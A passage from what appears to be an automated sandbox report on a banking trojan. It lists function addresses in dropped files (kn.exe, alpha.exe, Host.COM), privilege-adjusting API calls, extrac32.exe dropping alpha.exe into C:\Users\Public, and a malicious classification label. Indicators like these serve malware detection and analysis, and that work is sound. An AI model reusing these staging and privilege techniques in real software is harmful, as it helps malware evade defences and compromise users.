      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081E4F06_2_00007FF7E081E4F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08784D86_2_00007FF7E08784D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08A842F6_2_00007FF7E08A842F
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E079A4246_2_00007FF7E079A424
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087E4306_2_00007FF7E087E430
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080A4506_2_00007FF7E080A450
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080C4506_2_00007FF7E080C450
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08284886_2_00007FF7E0828488
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E84846_2_00007FF7E07E8484
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08704906_2_00007FF7E0870490
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08885A86_2_00007FF7E08885A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A05E06_2_00007FF7E07A05E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08985EC6_2_00007FF7E08985EC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E079C5206_2_00007FF7E079C520
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08645386_2_00007FF7E0864538
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F655C6_2_00007FF7E07F655C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C85706_2_00007FF7E07C8570
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E25806_2_00007FF7E07E2580
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082E57C6_2_00007FF7E082E57C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FC6D06_2_00007FF7E07FC6D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080C6F86_2_00007FF7E080C6F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085C6306_2_00007FF7E085C630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F86306_2_00007FF7E07F8630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08127D06_2_00007FF7E08127D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08407D06_2_00007FF7E08407D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081C7F06_2_00007FF7E081C7F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08867506_2_00007FF7E0886750
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08708C86_2_00007FF7E08708C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08748C46_2_00007FF7E08748C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08828546_2_00007FF7E0882854
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081E8446_2_00007FF7E081E844
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086A9F06_2_00007FF7E086A9F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FE9F06_2_00007FF7E07FE9F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F09EC6_2_00007FF7E07F09EC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081AA006_2_00007FF7E081AA00
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07929406_2_00007FF7E0792940
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F69846_2_00007FF7E07F6984
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E89906_2_00007FF7E07E8990
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0864A406_2_00007FF7E0864A40
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087AA586_2_00007FF7E087AA58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0884A586_2_00007FF7E0884A58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081EA7C6_2_00007FF7E081EA7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0816A846_2_00007FF7E0816A84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0808BD46_2_00007FF7E0808BD4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07DCBFC6_2_00007FF7E07DCBFC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E079AC086_2_00007FF7E079AC08
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E4B306_2_00007FF7E07E4B30
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B4B686_2_00007FF7E07B4B68
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0846B946_2_00007FF7E0846B94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082CCA86_2_00007FF7E082CCA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0888CF46_2_00007FF7E0888CF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A8D006_2_00007FF7E07A8D00
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0822CF86_2_00007FF7E0822CF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07ECD106_2_00007FF7E07ECD10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E0C286_2_00007FF7E07E0C28
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0868C586_2_00007FF7E0868C58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E089CC8C6_2_00007FF7E089CC8C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080CC806_2_00007FF7E080CC80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BEDA46_2_00007FF7E07BEDA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F2D186_2_00007FF7E07F2D18
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E8D2C6_2_00007FF7E07E8D2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0872D6C6_2_00007FF7E0872D6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0806D7C6_2_00007FF7E0806D7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0878EAC6_2_00007FF7E0878EAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CEED46_2_00007FF7E07CEED4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0796EF46_2_00007FF7E0796EF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0874E586_2_00007FF7E0874E58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B8F1C6_2_00007FF7E07B8F1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0834F946_2_00007FF7E0834F94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C4F906_2_00007FF7E07C4F90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07AB09C6_2_00007FF7E07AB09C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07910306_2_00007FF7E0791030
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D107C6_2_00007FF7E07D107C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07ED0946_2_00007FF7E07ED094
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07AD1B86_2_00007FF7E07AD1B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E11C86_2_00007FF7E07E11C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E31E06_2_00007FF7E07E31E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085511C6_2_00007FF7E085511C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081F1686_2_00007FF7E081F168
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086D2B46_2_00007FF7E086D2B4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E079F2C06_2_00007FF7E079F2C0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F92C46_2_00007FF7E07F92C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07ED2C06_2_00007FF7E07ED2C0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08092D86_2_00007FF7E08092D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08452906_2_00007FF7E0845290
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087B3AC6_2_00007FF7E087B3AC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08933D46_2_00007FF7E08933D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08833D06_2_00007FF7E08833D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07973F86_2_00007FF7E07973F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080D4106_2_00007FF7E080D410
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08253186_2_00007FF7E0825318
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C73406_2_00007FF7E07C7340
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BB36C6_2_00007FF7E07BB36C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B54A06_2_00007FF7E07B54A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08894A86_2_00007FF7E08894A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08614F06_2_00007FF7E08614F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07DF4346_2_00007FF7E07DF434
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07DD4406_2_00007FF7E07DD440
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07954386_2_00007FF7E0795438
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083D4606_2_00007FF7E083D460
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08494946_2_00007FF7E0849494
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F74786_2_00007FF7E07F7478
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F55F06_2_00007FF7E07F55F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E079F6106_2_00007FF7E079F610
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08195FC6_2_00007FF7E08195FC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080F5206_2_00007FF7E080F520
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C156C6_2_00007FF7E07C156C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CB58C6_2_00007FF7E07CB58C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08695806_2_00007FF7E0869580
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E76B06_2_00007FF7E07E76B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E084D6A06_2_00007FF7E084D6A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081F6D86_2_00007FF7E081F6D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E086D6DC6_2_00007FF7E086D6DC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08736386_2_00007FF7E0873638
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D56486_2_00007FF7E07D5648
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BD6606_2_00007FF7E07BD660
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08656606_2_00007FF7E0865660
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08476786_2_00007FF7E0847678
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08776786_2_00007FF7E0877678
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07D17D46_2_00007FF7E07D17D4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08077C86_2_00007FF7E08077C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FD7F06_2_00007FF7E07FD7F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07AF8006_2_00007FF7E07AF800
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08137606_2_00007FF7E0813760
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E97906_2_00007FF7E07E9790
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07AB7886_2_00007FF7E07AB788
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E58CC6_2_00007FF7E07E58CC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B18306_2_00007FF7E07B1830
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08438206_2_00007FF7E0843820
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082184C6_2_00007FF7E082184C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08638746_2_00007FF7E0863874
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082D8586_2_00007FF7E082D858
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F78906_2_00007FF7E07F7890
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08119AC6_2_00007FF7E08119AC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07BF9B86_2_00007FF7E07BF9B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0791A106_2_00007FF7E0791A10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E088994C6_2_00007FF7E088994C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08879386_2_00007FF7E0887938
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081F9906_2_00007FF7E081F990
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A7AB46_2_00007FF7E07A7AB4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F7AC86_2_00007FF7E07F7AC8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E080BA486_2_00007FF7E080BA48
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C3A406_2_00007FF7E07C3A40
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E1A606_2_00007FF7E07E1A60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0849A586_2_00007FF7E0849A58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0795BA46_2_00007FF7E0795BA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07B9BC86_2_00007FF7E07B9BC8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FDBF06_2_00007FF7E07FDBF0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0843C106_2_00007FF7E0843C10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E085BB286_2_00007FF7E085BB28
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E083FB506_2_00007FF7E083FB50
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0827B746_2_00007FF7E0827B74
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0801B846_2_00007FF7E0801B84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E079FB846_2_00007FF7E079FB84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07ABCA46_2_00007FF7E07ABCA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C9CD06_2_00007FF7E07C9CD0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0859CC06_2_00007FF7E0859CC0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EBCE86_2_00007FF7E07EBCE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A5D086_2_00007FF7E07A5D08
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CFC206_2_00007FF7E07CFC20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EFC346_2_00007FF7E07EFC34
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E3C606_2_00007FF7E07E3C60
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E089FC906_2_00007FF7E089FC90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0811C906_2_00007FF7E0811C90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E082BDA06_2_00007FF7E082BDA0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07A1DE86_2_00007FF7E07A1DE8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C5DF76_2_00007FF7E07C5DF7
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07CDD206_2_00007FF7E07CDD20
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0847D706_2_00007FF7E0847D70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F1D706_2_00007FF7E07F1D70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E9D6C6_2_00007FF7E07E9D6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E089DD846_2_00007FF7E089DD84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07EDEA46_2_00007FF7E07EDEA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081DEB06_2_00007FF7E081DEB0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07E1ED06_2_00007FF7E07E1ED0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0819EE46_2_00007FF7E0819EE4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0825F046_2_00007FF7E0825F04
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0821E2C6_2_00007FF7E0821E2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E081BE706_2_00007FF7E081BE70
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0849FF86_2_00007FF7E0849FF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0791F806_2_00007FF7E0791F80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07FC0B86_2_00007FF7E07FC0B8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07F80186_2_00007FF7E07F8018
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C80806_2_00007FF7E07C8080
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08620846_2_00007FF7E0862084
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF20C49_2_02DF20C4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79375785410_2_00007FF793757854
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937537D810_2_00007FF7937537D8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374341010_2_00007FF793743410
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374AA5410_2_00007FF79374AA54
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793748DF810_2_00007FF793748DF8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79375555410_2_00007FF793755554
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937518D410_2_00007FF7937518D4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374B0D810_2_00007FF79374B0D8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374851010_2_00007FF793748510
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793742C4810_2_00007FF793742C48
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376AC4C10_2_00007FF79376AC4C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374188410_2_00007FF793741884
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376AFBC10_2_00007FF79376AFBC
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793746BE010_2_00007FF793746BE0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374372C10_2_00007FF79374372C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793749B5010_2_00007FF793749B50
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793745B7010_2_00007FF793745B70
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793743F9010_2_00007FF793743F90
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793746EE410_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793767F0010_2_00007FF793767F00
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79375422410_2_00007FF793754224
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374222010_2_00007FF793742220
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793744A3010_2_00007FF793744A30
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376AA3010_2_00007FF79376AA30
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374524010_2_00007FF793745240
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374765010_2_00007FF793747650
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374D25010_2_00007FF79374D250
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793749E5010_2_00007FF793749E50
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793750A6C10_2_00007FF793750A6C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374E68010_2_00007FF79374E680
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376EE8810_2_00007FF79376EE88
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937481D410_2_00007FF7937481D4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376D9D010_2_00007FF79376D9D0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374CE1010_2_00007FF79374CE10
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793747D3010_2_00007FF793747D30
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79377153810_2_00007FF793771538
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79375785411_2_00007FF793757854
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937537D811_2_00007FF7937537D8
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374341011_2_00007FF793743410
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374AA5411_2_00007FF79374AA54
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793748DF811_2_00007FF793748DF8
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79375555411_2_00007FF793755554
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937518D411_2_00007FF7937518D4
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374B0D811_2_00007FF79374B0D8
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374851011_2_00007FF793748510
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793742C4811_2_00007FF793742C48
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376AC4C11_2_00007FF79376AC4C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374188411_2_00007FF793741884
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376AFBC11_2_00007FF79376AFBC
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793746BE011_2_00007FF793746BE0
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374372C11_2_00007FF79374372C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793749B5011_2_00007FF793749B50
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793745B7011_2_00007FF793745B70
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793743F9011_2_00007FF793743F90
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793746EE411_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793767F0011_2_00007FF793767F00
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79375422411_2_00007FF793754224
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374222011_2_00007FF793742220
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793744A3011_2_00007FF793744A30
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376AA3011_2_00007FF79376AA30
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374524011_2_00007FF793745240
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374765011_2_00007FF793747650
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374D25011_2_00007FF79374D250
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793749E5011_2_00007FF793749E50
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793750A6C11_2_00007FF793750A6C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374E68011_2_00007FF79374E680
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376EE8811_2_00007FF79376EE88
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937481D411_2_00007FF7937481D4
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376D9D011_2_00007FF79376D9D0
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374CE1011_2_00007FF79374CE10
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793747D3011_2_00007FF793747D30
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79377153811_2_00007FF793771538
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02DF44DC appears 74 times
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02E08954 appears 56 times
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02DF46D4 appears 244 times
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02DF4500 appears 33 times
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02DF4860 appears 949 times
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02E089D8 appears 45 times
      Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF793753448 appears 72 times
      Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF79375498C appears 40 times
      Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF79375081C appears 36 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E089F11C appears 37 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E089F1B8 appears 183 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E0857BAC appears 34 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E079D1C8 appears 41 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E082EB98 appears 93 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E08A64A6 appears 173 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E084ABFC appears 818 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E0850D10 appears 181 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E0857D70 appears 35 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E07CBC9C appears 280 times
      Source: classification engineClassification label: mal100.bank.troj.evad.winCMD@22/11@1/1
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937432B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,3_2_00007FF7937432B0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E087826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,6_2_00007FF7E087826C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79376FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,3_2_00007FF79376FB54
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E08841E0 _wcsnicmp,CoCreateInstance,#357,6_2_00007FF7E08841E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E0856320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,6_2_00007FF7E0856320
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
      Source: C:\Users\Public\Libraries\Host.COMKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
